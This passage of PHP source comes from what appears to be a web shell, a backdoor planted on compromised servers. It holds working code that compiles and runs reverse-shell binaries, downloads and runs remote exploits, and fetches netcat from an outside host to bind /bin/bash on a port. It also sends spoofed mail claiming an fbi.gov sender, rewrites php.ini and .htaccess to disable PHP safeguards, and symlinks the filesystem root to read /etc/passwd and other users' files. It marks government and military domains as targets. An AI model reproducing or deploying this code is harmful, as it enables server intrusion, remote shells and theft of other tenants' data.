2605 elseif(isset($_POST['backconn'])&&!empty($_POST['backport'])&&!empty($_POST['ip'])&&($_POST['use']=='C')) {
2606 $ip=trim($_POST['ip']);
2607 $port=trim($_POST['backport']);
2608 tulis("bcc.c",$back_connect_c);
2609 exe("gcc -o bcc bcc.c");
2610 exe("chmod 777 bcc");
2611 @unlink("bcc.c");
2612 exe("./bcc ".$ip." ".$port." &");
2613 $msg="Now script try connect to ".$ip." port ".$port." ...";
2614 }
2615 elseif(isset($_POST['backconn'])&&!empty($_POST['backport'])&&!empty($_POST['ip'])&&($_POST['use']=='Perl')) {
2616 $ip=trim($_POST['ip']);
2617 $port=trim($_POST['backport']);
2618 tulis("bcp",$back_connect);
2619 exe("chmod +x bcp");
2620 $p2=which("perl");
2621 exe($p2." bcp ".$ip." ".$port." &");
2622 $msg="Now script try connect to ".$ip." port ".$port." ...";
2623 }
2624 elseif(isset($_POST['expcompile'])&&!empty($_POST['wurl'])&&!empty($_POST['wcmd'])) {
2625 $pilihan=trim($_POST['pilihan']);
2626 $wurl=trim($_POST['wurl']);
2627 $namafile=download($pilihan,$wurl);
2628 if(is_file($namafile)) {
2629 $msg=exe($wcmd);
2630 }
2631 else
2632 $msg="error: file not found $namafile";
2633 }
2634 ?>
2635<table class="tabnet">
2636<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
2637<tr>
2638<td>
2639<table>
2640<form method="post" action="?y=<?php echo $pwd;?>&x=netsploit">
2641<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport?>"></td></tr>
2642<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass;?>"></td></tr>
2643<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2644<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
2645</table>
2646</td>
2647<td>
2648<table>
2649<form method="post" action="?y=<?php echo $pwd;?>&x=netsploit">
2650<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo((getenv('REMOTE_ADDR'))?(getenv('REMOTE_ADDR')):("127.0.0.1"));?>"></td></tr>
2651<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport;?>"></td></tr>
2652<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2653<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
2654</table>
2655</td>
2656<td>
2657<table>
2658<form method="post" action="?y=<?php echo $pwd;?>&x=netsploit">
2659<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
2660<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
2661</tr>
2662<tr><td><select size="1" class="inputz" name="pilihan">
2663<option value="wwget">wget</option>
2664<option value="wlynx">lynx</option>
2665<option value="wfread">fread</option>
2666<option value="wfetch">fetch</option>
2667<option value="wlinks">links</option>
2668<option value="wget">GET</option>
2669<option value="wcurl">curl</option>
2670</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
2671</table>
2672</td>
2673</tr>
2674</table>
2675<form action="" method="post">
2676<table class="tabnet" align="center">
2677<tr>
2678<td style="padding-left:3;">Netcat $ <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:629px;"value="./nc -vv -l -p 6969 -e /bin/bash" /></td>
2679<?php
2680if(isset($_POST['submitcmd'])) {
2681 if(!file_exists('nc')) {
2682 @exe('wget http://syntax-errorz.googlecode.com/svn/trunk/nc');
2683 }
2684 @exe('chmod 777 nc');
2685 @exe($_POST['cmd']);
2686 echo '<td><input class="inputzbut" type="submit" value="Stops !" name="cancelcmd" style="width:80px;" /></td>';
2687 }
2688 else {
2689 echo '<td><input class="inputzbut" type="submit" value="Start !" name="submitcmd" style="width:80px;" /></td>';
2690 }
2691 if(isset($_POST['cancelcmd'])) {
2692 if(file_exists('nc')) {
2693 @unlink('nc');
2694 }
2695 }
2696 ?>
2697</tr></table></form>
2698<div style="text-align:center;margin:2px;"><?php echo $msg;?></div>
2699<?php
2700}
2701elseif(isset($_GET['x'])&&($_GET['x']=='mail')) {
2702 echo "<center style='-webkit-margin-before:20px;'>";
2703 if(isset($_POST['mail_send'])) {
2704 $mail_to=$_POST['mail_to'];
2705 $mail_from=$_POST['mail_from'];
2706 $mail_subject=$_POST['mail_subject'];
2707 $mail_content=magicboom($_POST['mail_content']);
2708 if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")) {
2709 $msg="[Mail] : <span class='gaya'>Success Sent To</span> $mail_to";
2710 }
2711 else
2712 $msg="[Mail] : <span class='guyu'>Send Failed</span>";
2713 }
2714 ?>
2715<br/>
2716<form action="?y=<?php echo $pwd;?>&x=mail" method="post">
2717<textarea class="output" name="mail_content" id="cmd" style="height:280px;">Hey there, please patch me ! </textarea>
2718<table class="cmdbox" width="20%">
2719<tr><td>Mail To : <input class="inputz" style="width:20%;" type="text" value="<?php echo $admin_id;?>" name="mail_to" /></td></tr>
2720<tr><td>From : <input class="inputz" style="width:20%;" type="text" value="<?php echo $xName."@fbi.gov";?>" name="mail_from" /></td></tr>
2721<tr><td>Subject : <input class="inputz" style="width:20%;" type="text" value="Patch Your System" name="mail_subject" /></td></tr>
2722<tr><td><input style="width:23%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr>
2723<tr><td><?php echo $msg;?></td></tr>
2724</table>
2725<?php
2726}
2727elseif(isset($_GET['x'])&&($_GET['x']=='bypass')) {
2728 ?>
2729<form action="?y=<?php echo $pwd;?>&x=bypass" method="post" style="-webkit-margin-before:20px;">
2730<input name="matikan" type="hidden" value="sekatan">
2731<?php
2732if(($safemode=='0')&&''==($func=@ini_get('disable_functions'))) {
2733 echo "<br/><center>[Bypass] : <span class='gaya'>Safemode And Disable Function Was Successfull</span>
2734</center>";
2735 }
2736 else {
2737 echo "<br/><center>[Bypass] : <span class='gaya'>Safemode And Disable Function With</span>
2738<select class='inputzbut' name='type'>
2739<option value='1'>php.ini</option>
2740<option value='2'>.htaccess</option>
2741<option value='3'>Both</option>
2742</select>
2743<input class='inputzbut' type='submit' value='Go !'/>
2744</center>";
2745 }
2746 ?>
2747<?php
2748if($_POST['matikan']=='sekatan') {
2749 @error_reporting(0);
2750 $phpini='c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
2751 $htaccess='T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
2752 if($_POST['type']=='1') {
2753 $file=fopen("php.ini","w+");
2754 $write=fwrite($file,base64_decode($phpini));
2755 fclose($file);
2756 }
2757 if($_POST['type']=='2') {
2758 $file=fopen(".htaccess","w+");
2759 $write=fwrite($file,base64_decode($htaccess));
2760 fclose($file);
2761 }
2762 if($_POST['type']=='3') {
2763 $file1=fopen("php.ini","w+");
2764 $write1=fwrite($file1,base64_decode($phpini));
2765 fclose($file1);
2766 $file2=fopen(".htaccess","w+");
2767 $write2=fwrite($file2,base64_decode($htaccess));
2768 fclose($file2);
2769 }
2770 echo "<center><span class='gaya'>[</span> <a href=".$_SERVER['PHP_SELF'].">DONE</a> <span class='gaya'>]</span></center>";
2771 }
2772}
2773elseif(isset($_GET['x'])&&($_GET['x']=='logout')) {
2774 ?>
2775<form action="?y=<?php echo $pwd;?>&x=logout" method="post" style="-webkit-margin-before:20px;">
2776<?php
2777unset($_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])]);
2778 echo '<br/><center>Logout Successfull</center>';
2779}
2780elseif(isset($_GET['x'])&&($_GET['x']=='symlinkss')) {
2781 ?>
2782<form action="?y=<?php echo $pwd;?>&x=symlinkss" method="post" style="-webkit-margin-before:20px;">
2783<?php
2784@set_time_limit(0);
2785 echo "<center><div>";
2786 if(isset($_POST['submitcmd'])) {
2787 $r=stripcslashes($_POST['file']);
2788 if(file_exists('passwd.txt')or!file_exists('passwd.txt')) {
2789 $f=@fopen('passwd.txt','w+');
2790 $w=@fwrite($f,$r);
2791 fclose($f);
2792 }
2793 }
2794 if(isset($_POST['dellpass'])) {
2795 if(file_exists('passwd.txt')) {
2796 @unlink('passwd.txt');
2797 @unlink('sym/.htaccess');
2798 @unlink('sym/root');
2799 @rmdir('sym');
2800 }
2801 }
2802 if($wor@filesize('passwd.txt')>0) {
2803 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='dellpass'/></form></center>";
2804 echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th style='width:50px;padding:0px;'>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
2805 $fil3=file('passwd.txt');
2806 $pageFTP='ftp://'.$_SERVER["SERVER_NAME"].$alamat;
2807 $total=0;
2808 $no=1;
2809 foreach($fil3 as $f) {
2810 $u=explode(':',$f);
2811 $user=$u['0'];
2812 $homeuser=$u['5'];
2813 echo "
2814<tr>
2815<td align='center'>".$no++."</td>
2816<td>
2817$user
2818</td>
2819<td align='left'>
2820<a href='$alamat/sym/root$homeuser/' target='_blank' class='gaya'>$homeuser/</a>
2821</td>
2822<td align='center'>
2823<a href='$alamat/sym/root$homeuser/' target='_blank' class='gaya'>Symlink</a>
2824</td>
2825</tr>";
2826 $total++;
2827 }
2828 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table></div>";
2829 }
2830 else {
2831 if(isset($_POST['sympass'])) {
2832 @mkdir('sym',0755);
2833 $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2834 $write=@fopen('sym/.htaccess','w');
2835 fwrite($write,$htaccess);
2836 @symlink('/','sym/root');
2837 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='symcan'/></form></center>";
2838 echo "<br/><form method='post' action=''><textarea width='500' rows='10' name='file' class='outputz'>";
2839 flush();
2840 $file='/etc/passwd';
2841 $r3ad=@fopen($file,'r');
2842 if($r3ad) {
2843 $content=@fread($r3ad,@filesize($file));
2844 echo "".htmlentities($content)."";
2845 }
2846 elseif(!$r3ad) {
2847 $r3ad=@show_source($file);
2848 echo "Can't Read -> [ /etc/passwd ]";
2849 }
2850 elseif(!$r3ad) {
2851 $r3ad=@highlight_file($file);
2852 }
2853 elseif(!$r3ad) {
2854 for($uid=0;$uid<1000;$uid++) {
2855 $ara=posix_getpwuid($uid);
2856 if(!empty($ara)) {
2857 while(list($key,$val)=each($ara)) {
2858 print "$val:";
2859 }
2860 print "\n";
2861 }
2862 }
2863 }
2864 flush();
2865 echo "</textarea><br /><br /><input type='submit' value='Symlink' name='submitcmd' class='inputzbut'/></form>";
2866 }
2867 else {
2868 if(isset($_POST['symcan'])) {
2869 @unlink('sym/.htaccess');
2870 @unlink('sym/root');
2871 @rmdir('sym');
2872 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2873 }
2874 else {
2875 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2876 }
2877 }
2878 }
2879}
2880elseif(isset($_GET['x'])&&($_GET['x']=='symlinks')) {
2881 ?>
2882<form action="?y=<?php echo $pwd;?>&x=symlinks" method="post" style="-webkit-margin-before:20px;">
2883<?php
2884@set_time_limit(0);
2885 echo "<center><div>";
2886 if(isset($_POST['submitcmd'])) {
2887 $r=stripcslashes($_POST['file']);
2888 if(file_exists('passwd.txt')or!file_exists('passwd.txt')) {
2889 $f=@fopen('passwd.txt','w+');
2890 $w=@fwrite($f,$r);
2891 fclose($f);
2892 }
2893 }
2894 if(isset($_POST['dellpass'])) {
2895 if(file_exists('passwd.txt')) {
2896 @unlink('passwd.txt');
2897 @unlink('sym/.htaccess');
2898 @unlink('sym/root');
2899 @rmdir('sym');
2900 }
2901 }
2902 if($wor@filesize('passwd.txt')>0) {
2903 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='dellpass'/></form></center>";
2904 echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th style='width:30px;padding:0px;'>FTP</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
2905 $fil3=file('passwd.txt');
2906 $pageFTP='ftp://'.$_SERVER["SERVER_NAME"].$alamat;
2907 $total=0;
2908 $no=1;
2909 foreach($fil3 as $f) {
2910 $u=explode(':',$f);
2911 $user=$u['0'];
2912 echo "
2913<tr>
2914<td align='center'>".$no++."</td>
2915<td>
2916$user
2917</td>
2918<td align='center'>
2919<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank' class='gaya'>FTP</a>
2920</td>
2921<td align='center'>
2922<a href='$alamat/sym/root/home/$user/public_html' target='_blank' class='gaya'>Symlink</a>
2923</td>
2924</tr>";
2925 $total++;
2926 }
2927 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table></div>";
2928 }
2929 else {
2930 if(isset($_POST['sympass'])) {
2931 @mkdir('sym',0755);
2932 $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2933 $write=@fopen('sym/.htaccess','w');
2934 fwrite($write,$htaccess);
2935 @symlink('/','sym/root');
2936 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='symcan'/></form></center>";
2937 echo "<br/><form method='post' action=''><textarea width='500' rows='10' name='file' class='outputz'>";
2938 flush();
2939 $file='/etc/passwd';
2940 $r3ad=@fopen($file,'r');
2941 if($r3ad) {
2942 $content=@fread($r3ad,@filesize($file));
2943 echo "".htmlentities($content)."";
2944 }
2945 elseif(!$r3ad) {
2946 $r3ad=@show_source($file);
2947 echo "Can't Read -> [ /etc/passwd ]";
2948 }
2949 elseif(!$r3ad) {
2950 $r3ad=@highlight_file($file);
2951 }
2952 elseif(!$r3ad) {
2953 for($uid=0;$uid<1000;$uid++) {
2954 $ara=posix_getpwuid($uid);
2955 if(!empty($ara)) {
2956 while(list($key,$val)=each($ara)) {
2957 print "$val:";
2958 }
2959 print "\n";
2960 }
2961 }
2962 }
2963 flush();
2964 echo "</textarea><br /><br /><input type='submit' value='Symlink' name='submitcmd' class='inputzbut'/></form>";
2965 }
2966 else {
2967 if(isset($_POST['symcan'])) {
2968 @unlink('sym/.htaccess');
2969 @unlink('sym/root');
2970 @rmdir('sym');
2971 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2972 }
2973 else {
2974 echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2975 }
2976 }
2977 }
2978}
2979elseif(isset($_GET['x'])&&($_GET['x']=='symlink')) {
2980 ?>
2981<form action="?y=<?php echo $pwd;?>&x=symlink" method="post">
2982<?php
2983@set_time_limit(0);
2984 echo "<center style='-webkit-margin-before:20px;'><div>";
2985 $filelocation=basename(__FILE__);
2986 $read_named_conf=@file('/etc/named.conf');
2987 if($read_named_conf) {
2988 @mkdir('sym',0755);
2989 $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2990 $write=@fopen('sym/.htaccess','w');
2991 fwrite($write,$htaccess);
2992 @symlink('/','sym/root');
2993 if(isset($_POST['cansym'])) {
2994 @unlink('sym/.htaccess');
2995 @unlink('sym/root');
2996 @rmdir('sym');
2997 echo "<br/>[Symlink] : <span class='gaya'>Success Read -> [ /etc/named.conf ]</span> <form action='?y=".$pwd."&x=symlink' method='post'><input type='submit' class='inputzbut' name='symcmd' value='Symlink'></form>";
2998 }
2999 else {
3000 echo "<br/>[Symlink] : <span class='gaya'>Success Read -> [ /etc/named.conf ]</span> <form action='?y=".$pwd."&x=symlink' method='post'><a href='?y=".$pwd."&x=symlinks' class='no'><input class='inputzbut' type='button' value='Bypass' name='sympass'/></a><input type='submit' class='inputzbut' name='cansym' value='Cancel'>";
3001 echo "</form><br/><br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Domains</th><th>Users</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
3002 $total=0;
3003 $no=1;
3004 foreach($read_named_conf as $subject) {
3005 if(eregi('zone',$subject)) {
3006 preg_match_all('#zone "(.*)"#',$subject,$string);
3007 flush();
3008 if(strlen(trim($string[1][0]))>2) {
3009 $UID=posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
3010 $name=$UID['name'];
3011 @symlink('/','sym/root');
3012 $name=$string[1][0];
3013 $iran='\.ir';
3014 $israel='\.il';
3015 $indo='\.id';
3016 $sg12='\.sg';
3017 $edu='\.edu';
3018 $gov='\.gov';
3019 $gose='\.go';
3020 $gober='\.gob';
3021 $mil1='\.mil';
3022 $mil2='\.mi';
3023 $malay='\.my';
3024 $china='\.cn';
3025 $japan='\.jp';
3026 $austr='\.au';
3027 $porn='\.xxx';
3028 $as='\.uk';
3029 $calfn='\.ca';
3030 if(eregi("$iran",$string[1][0])oreregi("$israel",$string[1][0])oreregi("$indo",$string[1][0])oreregi("$sg12",$string[1][0])oreregi("$edu",$string[1][0])oreregi("$gov",$string[1][0])oreregi("$gose",$string[1][0])oreregi("$gober",$string[1][0])oreregi("$mil1",$string[1][0])oreregi("$mil2",$string[1][0])oreregi("$malay",$string[1][0])oreregi("$china",$string[1][0])oreregi("$japan",$string[1][0])oreregi("$austr",$string[1][0])oreregi("$porn",$string[1][0])oreregi("$as",$string[1][0])oreregi("$calfn",$string[1][0])) {
3031 $name="<div class='guyu'>".$string[1][0].'</div>';
3032 }
3033 echo "
3034<tr><td align='center'>".$no++."</td><td><div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.'</a></div></td><td>'.$UID['name']."</td><td align='center'><a href='".$alamat."/sym/root/home/".$UID['name']."/public_html' target='_blank'><span class='gaya'>Symlink</a></td></tr></div>";
3035 $total++;
3036 flush();
3037 }
3038 }
3039 }
3040 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table>";
3041 }
3042 }
3043 else {
3044 echo "<br/>[Symlink] : <span class='guyu'>Can't Read -> [ /etc/named.conf ]</span> <form><a href='?y=".$pwd."&x=symlinks' class='no'><input type='button' class='inputzbut' name='symcmd' value='Bypass'/></a></form>";
3045 }
3046 echo "</center>";
3047}
3048elseif(isset($_GET['x'])&&($_GET['x']=='jumpings')) {
3049 echo "<center style='-webkit-margin-before:20px;'><br/><div>";($sm=ini_get('safe_mode')==0)?$sm='off':die("[Error] : <span class='guyu'>Safemode = ON</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
3050 set_time_limit(0);
3051 @$passwd=fopen('/etc/passwd','r');
3052 if(!$passwd) {
3053 die("[Error] : <span class='guyu'>Can't Read -> [ /etc/passwd ]</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
3054 }
3055 else {
3056 $pubs=array();
3057 $users=array();
3058 $i=0;
3059 while(!feof($passwd)) {
3060 $str=fgets($passwd);
3061 if($i>100) {
3062 $pos=strpos($str,':');
3063 $usr=explode(":",$str);
3064 $username=substr($str,0,$pos);
3065 $dirz=$usr[5];
3066 if(($username!='')) {
3067 if(is_readable($dirz)) {
3068 array_push($users,$username);
3069 array_push($pubs,$dirz);
3070 }
3071 }
3072 }
3073 $i++;
3074 }
3075 echo "<div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Jumping</th></thead><tbody>";
3076 $total=0;
3077 $no=1;
3078 foreach(array_combine($users,$pubs) as $user=>$pub) {
3079 echo '<tr><td align=\'center\'>'.$no++.'</td><td>'.$user.'</td><td><a href="?y='.$pub.'" class="gaya">'.$pub.'</a></td><td align=\'center\'><a href="?y='.$pub.'" class="gaya" target="_blank">Jumping</a></td></tr>';
3080 $total++;
3081 }
3082 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Jumping</th><tfoot></table></div></div></center>";
3083 }
3084}
3085elseif(isset($_GET['x'])&&($_GET['x']=='jumping')) {
3086 echo "<center style='-webkit-margin-before:20px;'><br/><div>";($sm=ini_get('safe_mode')==0)?$sm='off':die("[Error] : <span class='guyu'>Safemode = ON</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
3087 set_time_limit(0);
3088 @$passwd=fopen('/etc/passwd','r');
3089 if(!$passwd) {
3090 die("[Error] : <span class='guyu'>Can't Read -> [ /etc/passwd ]</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
3091 }
3092 else {
3093 $pub=array();
3094 $users=array();
3095 $i=0;
3096 while(!feof($passwd)) {
3097 $str=fgets($passwd);
3098 if($i>100) {
3099 $pos=strpos($str,':');
3100 $username=substr($str,0,$pos);
3101 $dirz='/home/'.$username.'/public_html/';
3102 if(($username!='')) {
3103 if(is_readable($dirz)) {
3104 array_push($users,$username);
3105 array_push($pub,$dirz);
3106 }
3107 }
3108 }
3109 $i++;
3110 }
3111 echo "<div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Jumping</th></thead><tbody>";
3112 $total=0;
3113 $no=1;
3114 foreach($users as $user) {
3115 echo '<tr><td align=\'center\'>'.$no++.'</td><td>'.$user.'</td><td><a href="?y=/home/'.$user.'/public_html" class="gaya">/home/'.$user.'/public_html/</a></td><td align=\'center\'><a href="?y=/home/'.$user.'/public_html" class="gaya" target="_blank">Jumping</a></td></tr>';
3116 $total++;
3117 }
3118 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Jumping</th><tfoot></table></div></div></center>";
3119 }
3120}
3121elseif(isset($_GET['x'])&&($_GET['x']=='processes')) {
3122 echo "<center style='-webkit-margin-before:20px;'>";
3123 function getdisfunc() {
3124 $disfunc=@ini_get("disable_functions");
3125 if(!empty($disfunc)) {
3126 $disfunc=str_replace(" ","",$disfunc);
3127 $disfunc=explode(",",$disfunc);
3128 }
3129 else {
3130 $disfunc=array();
3131 }
3132 return $disfunc;
3133 }
3134 function enabled($func) {
3135 if(function_exists($func)&&is_callable($func)&&!in_array($func,getdisfunc())) {
3136 return TRUE;
3137 }
3138 else {
3139 return FALSE;
3140 }
3141 }
3142 function fx29exec($cmd) {
3143 $output="";
3144 if(enabled("popen")) {
3145 $h=popen($cmd.' 2>&1','r');
3146 if(is_resource($h)) {
3147 while(!feof($h)) {
3148 $output.=fread($h,2096);
3149 }
3150 pclose($h);
3151 }
3152 }
3153 elseif(enabled("passthru")) {
3154 @ob_start();
3155 passthru($cmd);
3156 $output=@ob_get_contents();
3157 @ob_end_clean();
3158 }
3159 elseif(enabled("system")) {
3160 @ob_start();
3161 system($cmd);
3162 $output=@ob_get_contents();
3163 @ob_end_clean();
3164 }
3165 elseif(enabled("exec")) {
3166 exec($cmd,$o);
3167 $output=join("\r\n",$o);
3168 }
3169 elseif(enabled("shell_exec")) {
3170 $output=shell_exec($cmd);
3171 }
3172 return $output;
3173 }
3174 function fx29exec2($cmd) {
3175 $output="";
3176 if(enabled("shell_exec")) {
3177 $output=shell_exec($cmd);
3178 }
3179 elseif(enabled("exec")) {
3180 exec($cmd,$o);
3181 $output=join("\r\n",$o);
3182 }
3183 elseif(enabled("system")) {
3184 @ob_start();
3185 system($cmd);
3186 $output=@ob_get_contents();
3187 @ob_end_clean();
3188 }
3189 elseif(enabled("passthru")) {
3190 @ob_start();
3191 passthru($cmd);
3192 $output=@ob_get_contents();
3193 @ob_end_clean();
3194 }
3195 elseif(enabled("popen")) {
3196 $h=popen($cmd.' 2>&1','r');
3197 if(is_resource($h)) {
3198 while(!feof($h)) {
3199 $output.=fread($h,2096);
3200 }
3201 pclose($h);
3202 }
3203 }
3204 return $output;
3205 }
3206 function is_windows() {
3207 return strtolower(substr(PHP_OS,0,3))=="win";
3208 }
3209 function tabsort($a,$b) {
3210 global $v;
3211 return strnatcmp($a[$v],$b[$v]);
3212 }
3213 function parsesort($sort) {
3214 $one=intval($sort);
3215 $second=substr($sort,-1);
3216 if($second!="d") {
3217 $second="a";
3218 }
3219 return array($one,$second);
3220 }
3221 function disp_error($msg) {
3222 echo "<div class=errmsg>$msg</div>\n";
3223 }
3224 $auto_surl=TRUE;
3225 foreach($_REQUEST as $k=>$v) {
3226 if(!isset($$k)) {
3227 $$k=$v;
3228 }
3229 }
3230 if($auto_surl) {
3231 $include="&";
3232 foreach(explode("&",getenv("QUERY_STRING")) as $v) {
3233 $v=explode("=",$v);
3234 $name=urldecode($v[0]);
3235 $value=@urldecode($v[1]);
3236 $needles=array("http://","https://","ssl://","ftp://","\\\\");
3237 foreach($needles as $needle) {
3238 if(strpos($value,$needle)===0) {
3239 $includestr.=urlencode($name)."=".urlencode($value)."&";
3240 }
3241 }
3242 }
3243 }
3244 if(empty($surl)) {
3245 $surl=htmlspecialchars("?".@$includestr);
3246 }
3247 if(!isset($x)) {
3248 $x="processes";
3249 }
3250 if($x=="processes") {
3251 if(!is_windows()) {
3252 $handler="ps aux".($grep?" | grep '".addslashes($grep)."'":"");
3253 }
3254 else {
3255 $handler="tasklist";
3256 }
3257 $ret=fx29exec($handler);
3258 if(!$ret) {
3259 disp_error("<br/><center>[Process] : <span class='guyu'>Can't Execute \"$handler\"</span></center>");
3260 }
3261 else {
3262 if(empty($processes_sort)) {
3263 $processes_sort=$sort_default;
3264 }
3265 $parsesort=parsesort($processes_sort);
3266 if(!is_numeric($parsesort[0])) {
3267 $parsesort[0]=0;
3268 }
3269 $k=$parsesort[0];
3270 if($parsesort[1]!="a") {
3271 $y=" <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/ascen.gif\" alt=\"Asc\"></a>";
3272 }
3273 else {
3274 $y=" <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/descen.gif\" alt=\"Dsc\"></a>";
3275 }
3276 $ret=htmlspecialchars($ret);
3277 if(!is_windows()) {
3278 if($pid) {
3279 if(is_null($sig)) {
3280 $sig=9;
3281 }
3282 echo "<br/><center>[Kill] : <span class='gaya'>Sending signal ".$sig." to #".$pid."... </span>";
3283 if(posix_kill($pid,$sig)) {
3284 echo "<b><span class='gaya'>OK!<span></b>";
3285 }
3286 else {
3287 echo "<b><span class='guyu'>ERROR!</span></b>";
3288 }
3289 echo "</center>";
3290 }
3291 while(ereg(" ",$ret)) {
3292 $ret=str_replace(" "," ",$ret);
3293 }
3294 $stack=explode("\n",$ret);
3295 $head=explode(" ",$stack[0]);
3296 unset($stack[0]);
3297 for($i=0;$i<count($head);$i++) {
3298 if($i!=$k) {
3299 $head[$i]="<div class='hp'><a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b class='gaya'>".$head[$i]."</b></a></div>";
3300 }
3301 }
3302 $head[$i]="<div class='hp'><a><b class='gaya'>KILL</b></a></div>";
3303 $prcs=array();
3304 foreach($stack as $line) {
3305 if(!empty($line)) {
3306 $line=explode(" ",$line);
3307 $line[10]=join(" ",array_slice($line,10));
3308 $line=array_slice($line,0,11);
3309 if($line[0]==get_current_user()) {
